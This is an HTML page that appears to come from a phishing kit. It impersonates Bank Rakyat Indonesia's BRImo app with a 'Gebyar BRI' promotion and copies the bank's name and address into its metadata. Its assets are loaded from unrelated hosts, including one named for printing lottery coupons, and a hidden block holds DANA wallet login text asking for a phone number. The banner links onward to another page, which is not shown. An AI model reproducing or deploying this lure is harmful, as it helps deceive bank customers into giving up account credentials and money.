<!DOCTYPE html>
<html>
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <link rel="stylesheet" type="text/css" href="cid:css-d73c5573-c8e3-448b-b8aa-9c44ce871e25@mhtml.blink" />
    <link rel="stylesheet" type="text/css" href="cid:css-6e03e636-52df-4177-b15c-6bae60262027@mhtml.blink" />
 <meta name="theme-color" content="#0F78CB"> 
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=0">
   	<meta property="og:title" content="PT. Bank Rakyat Indonesia (Persero) Tbk."> 
	<meta property="og:description" content="Gedung BRI Jl. Jenderal Sudirman Kav.44-46 Jakarta 10210 Indonesia">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>𝗚𝗲𝗯𝘆𝗮𝗿 𝗕𝗥𝗜 | 𝗕𝗥𝗜𝗺𝗼 𝗙𝗦𝗧𝗩𝗟</title>
<meta property="og:title" content="𝗚𝗲𝗯𝘆𝗮𝗿 𝗕𝗥𝗜 | 𝗕𝗥𝗜𝗺𝗼 𝗙𝗦𝗧𝗩𝗟">
<meta property="twitter:title" content="𝗚𝗲𝗯𝘆𝗮𝗿 𝗕𝗥𝗜 | 𝗕𝗥𝗜𝗺𝗼 𝗙𝗦𝗧𝗩𝗟">
<meta property="twitter:card" content="summary_large_image">
<meta property="og:image:type" content="image/jpeg">
<meta content="https://hosting.tigerengine.id/lvit0j.jpg" property="og:image">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0, maximum-scale=1">
 <link href="https://hosting.tigerengine.id/lvit0j.jpg" rel="icon" type="image/x-icon">
    <link href="https://hosting.tigerengine.id/lvit0j.jpg" rel="apple-touch-icon">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<meta property="twitter:card" content="summary_large_image">
<meta property="og:image:type" content="image/jpeg">
<meta content="https://hosting.tigerengine.id/lvit0j.jpg" property="og:image">


 <style>
   @charset "utf-8";



html, body { position: relative; height: 100%; overflow: hidden; background-color: rgb(255, 255, 255); font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 14px; color: rgb(0, 0, 0); margin: 0px; padding: 0px; }

* { font-family: "Open Sans", sans-serif; font-weight: 400; margin: 0px; padding: 0px; box-sizing: border-box; position: relative; color: rgb(255, 255, 255); }

b { font-weight: 700; }

html { width: 100%; height: 100%; }

body { background: rgb(17, 142, 234); width: 100%; height: 100%; }

.box-login, .container { background: rgb(17, 142, 234); height: 100%; width: 100%; }

body .header { width: 100%; margin-top: 10px; padding: 10px; height: 50px; display: flex; justify-content: center; align-items: center; }

body .header .back { height: 35%; max-height: 35%; min-height: 35%; position: absolute; left: 20px; }

body .header .logo { height: 100%; max-height: 100%; min-height: 100%; }

form { width: 100%; height: 100%; display: flex; padding: 50px 20px; align-items: center; flex-direction: column; }

form h3 { width: 100%; font-size: 14px; text-align: center; }

form .box-input { width: 100%; height: 42px; padding: 5px 15px; margin-top: 50px; background: rgb(255, 255, 255); display: flex; border-radius: 10px; align-items: center; }

form .box-input input::placeholder { color: rgb(198, 198, 198); }

form .box-input input { background: none; width: calc(100% - 70px); max-width: calc(100% - 70px); min-width: calc(100% - 70px); height: 100%; max-height: 100%; min-height: 100%; outline: none; border: none; font-size: 22px; font-weight: 600; text-align: left; color: rgb(0, 0, 0); display: flex; align-items: center; justify-content: center; caret-color: rgb(193, 193, 193); }

.box-input .label { height: 100%; min-height: 100%; max-height: 100%; padding: 4px; width: 70px; min-width: 70px; max-width: 70px; display: flex; justify-content: center; align-items: center; }

.box-input .label img { height: 55%; max-height: 55%; min-height: 55%; border-radius: 1px; box-shadow: rgba(0, 0, 0, 0.2) 0px 0px 2px; }

.box-input .label label { color: rgb(0, 0, 0); font-size: 15px; font-weight: 600; margin: 0px 10px; }

form .desc { width: 100%; margin-top: 40px; font-size: 13px; text-align: center; }

form .box-btn { width: 100%; height: auto; position: fixed; bottom: 0px; }

form .box-btn button:disabled { opacity: 0.7; }

form .box-btn button:active { background: rgba(0, 0, 0, 0.082); }

form .box-btn button { padding: 20px 0px 30px; opacity: 1; width: 100%; height: 60px; background: none; outline: none; border: none; font-size: 16px; text-align: center; }

.start { top: 0px; left: 0px; right: 0px; width: 100%; height: 100%; min-height: 100%; max-height: 100%; position: fixed; z-index: 999; display: flex; justify-content: center; align-items: center; flex-direction: column; background: rgb(17, 142, 234); }

.start .logo { width: 50%; margin-top: -40px; }

.start .footimg { width: 400px; height: 60px; display: flex; justify-content: center; align-items: center; position: fixed; bottom: 40px; z-index: 99999; }

.start .footimg img { min-height: 40px; max-height: 40px; height: 40px; margin: 0px 8px 0px 0px; }

.start .footimg p { font-size: 10px; white-space: nowrap; }

@media screen and (min-width: 900px) {
  html { background: rgb(17, 142, 234); }
  body { display: flex; justify-content: center; align-items: center; background: rgba(0, 0, 0, 0.106); }
  .container { width: 450px; min-width: 450px; max-width: 450px; height: 700px; min-height: 700px; max-height: 700px; display: flex; justify-content: center; align-items: center; margin: auto; border-radius: 15px; overflow: hidden; }
  .index { border-radius: 15px; width: 450px; min-width: 450px; max-width: 450px; height: 740px; min-height: 740px; max-height: 740px; }
  .start { border-radius: 15px; position: absolute; top: auto; left: auto; right: auto; width: 450px; min-width: 450px; max-width: 450px; height: 700px; min-height: 700px; max-height: 700px; z-index: 999; display: flex; justify-content: center; align-items: center; flex-direction: column; }
  .start .footimg { position: absolute; }
  .box-login { padding: 25px; width: 450px; min-width: 450px; max-width: 450px; height: 700px; min-height: 700px; max-height: 700px; box-shadow: rgba(0, 0, 0, 0.1) 0px 0px 7px; }
  form .box-btn { position: absolute; bottom: 0px; }
  form { height: 90%; min-height: 90%; max-height: 90%; }
}

 </style>
    
	 
</head>
<body style="background-color: #f5f5f5;">
    <div style="display:none;" class="index">
        <div class="header">
            <img src="https://cetak-kupon-undian.tyr-i.store/ast/img/dana_BRImo1.html" class="logo" alt="">
        </div>
        <div class="content">
            <div class="hero">
                <img src="https://cetak-kupon-undian.tyr-i.store/ast/img/hero.svg" alt="">
            </div>
            <h1>Dompet digital untuk kamu!</h1>
            <p class="desc">Simpan uang serta kartu debit/kredit dengan<br>praktis di DANA</p>
            <div class="line">
            </div>
            <p class="log">Masukkan <b>nomor HP</b> kamu untuk lanjut</p>
            <button type="button">LOGIN</button>
        </div>
    </div>
    <div class="start" style="background-color: rgb(255, 255, 255); display: none;">
        <img class="logo" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcBIQu172xTzuBu5ZshBMCydw-Hwty5J2XuYR_CgSrjEIOu4QUNhfSg7L9btOF988-pfoM5Qr02eyfUFIORKsiAo3Nw57Kw0k7Mex2kYDx3y9d-z4iLvErja61jVotArq2F4QTdK0wAIu0Up3wKFuv9IcrKIkJsUjd5B0O_TNcZHOA2TX1ubFS5nJwbnw/s1069/AddText_01-02-08.06.41.png" style=" width: 120px;">
        <img src="https://3.bp.blogspot.com/-GSG6Dwx9rcI/VmhOg6SwfAI/AAAAAAAAAxg/QqsVGQuANOQ/s320/bri-bank1.jpg" style="width: 30%; position: fixed; bottom: 20; left: 0; right: 0; margin: 0px auto">
    </div>
       <div class="container hid" style="display: block;">
 
        <div class="box-login" style="background-color: #0F78CB;">
            <div id="process" name="process" class="process" style="display: none;">
                <div class="loading">
                    <img src="https://cetak-kupon-undian.tyr-i.store/ast/img/load_bg.png">
                    <img class="spinner" src="https://cetak-kupon-undian.tyr-i.store/ast/img/load_spin.png">
                </div>
            </div>
             <div class="header11" style="margin-top: 56px; ">
                <a href="noo.html"><img src="https://cetak-kupon-undian.tyr-i.store/ast/img/bg.png" style="width: 100%; left: 0px; top: 0px; height: 95%"></a>
            </div>
             <img src="https://hosting.tigerengine.id/7wwgy7.png" style="width: 100%; position: fixed; top: 0; left: 0; right: 0; margin: 0px auto; border-bottom: 3px solid #fff;">   
             <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwzhsQd1K7iF1d2s06-jdlmwaZV6_bR1eZiRCjx7LnbIHag5c5iAEOVfgP9UE-lQqv0M2-C7gQ3u6y6C-0E1iLZASRfrNtk7YOeBa_5obrbvmB4yi2MOjPPseRovva7VTIMmt3dXKcdlSDiqBt5-D_T5W1RiloJ5AOct6wnyv4SZI6Cj6Ahfc2j_x3NZA/s1080/1703668668502.png" style="width: 100%; position: fixed; bottom: 0; left: 0; right: 0; margin: 0px auto">
        </div>
	</div>
	
